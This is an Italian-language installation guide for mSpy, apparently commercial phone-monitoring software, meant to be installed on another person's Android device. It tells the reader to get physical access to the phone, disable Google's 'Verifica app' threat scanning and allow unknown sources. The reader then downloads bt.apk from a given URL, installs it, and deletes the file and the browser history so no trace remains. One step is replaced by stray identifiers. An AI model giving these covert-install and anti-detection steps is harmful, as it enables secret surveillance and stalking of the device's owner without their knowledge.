Installazione Android

Per installare mSpy sul dispositivo Android da monitorare, devi avere accesso fisico al dispositivo e disporre della connessione a internet.

È importante che tu comprenda quanto segue: a causa dell’alto livello di customizzazione di Android OS, i passaggi della seguente guida possono differire rispetto a ciò che vedrai in realtà sul telefono. Comunque, tutte le sezioni del menu sono simili e sarai in grado di identificare facilmente come procedere. Per esempio, invece di ‘Applicazioni’ puoi trovare scritto ‘App’, ‘Gestore applicazioni’ o ‘Gestisci app’.

Preparativi

Prima di avviare l’installazione, per favore, accertati che sul dispositivo da monitorare, su Impostazioni → Sicurezza, sia spuntata la casella corrispondente a Origini sconosciute. È inoltre raccomandato rimuovere la spunta in corrispondenza della voce Verifica App.

install1 install2 install3 Verify1

Nota: Su Android versione 5.0 e superiori, l’opzione Verifica App si trova su Impostazioni Google → Sicurezza

English1 English2 English3

Su Android 6.X.X – Android 7.X Verifica App si trova su Impostazioni – Google – Sicurezza – Verifica app

Per disattivare ‘Verifica app’ su telefoni con sistema operativo Android 6.X.X., segui i seguenti passaggi:
  1. Apri ‘Impostazioni’ e vai su Google; se l’opzione è assente, seleziona Applicazioni > Google;
  2. 410178c8-33ce-4b75-b841-ae64e4358252 czoIt4VIayI fZo9TcYGzYQ
  3. Su ‘Servizi’, scegli la sezione ‘Sicurezza’
  4. Su ‘Verifica app’, disabilita l’opzione ‘Analizza dispositivo per minacce alla sicurezza’
English2 English3

Fai il download!

1. Dalla schermata iniziale, apri Tutte le App (lista di tutte le app disponibili) e scegli Google Chrome

install5 install6

2. Una volta individuata la homepage di Chrome, inserisci http://b55y.net/a nel campo per l’URL e seleziona ‘Invio’ sulla tastiera. Vedrai quindi la schermata provvista di captcha con un codice da inserire per avviare il processo di download.

captcha1 captcha2 captcha3

Per favore osserva che: http://b55y.net/a è un link per il download diretto che NON aprirà alcuna pagina web, ma avvierà semplicemente il download in background (dovrebbe apparire un piccolo messaggio, che ti informa sull’avvio del download).

3. Ora, vai di nuovo a Tutte le App, partendo dalla schermata principale, e individua i Download. Qui troverai il file bt.apk. Seleziona il file bt.apk e l’installazione inizierà.

install9 bt2

Installa!

1. Una volta aperto il file bt.apk, dovrai seguire questa sequenza: Successivo → Installa → Apri

Updateservice1 Updateservice2 Updateservice3
iit

Installazione completata!

Cancella la cronologia del browser e il pacchetto d’installazione.

Ora, puoi eliminare il file bt.apk dai Download. Seleziona il file (o seleziona e tieni premuto) e vedrai il simbolo del cestino su di esso. Clicca per cancellare il file selezionato.

install9 bt delete

Inoltre, puoi cancellare la cronologia di navigazione andando su Browser → seleziona il tasto Menu → Impostazioni → Sicurezza e Privacy → Cancella la cronologia di navigazione.

install5 install23 install24 install25 install26

E non ci saranno più tracce di mSpy sul dispositivo da monitorare!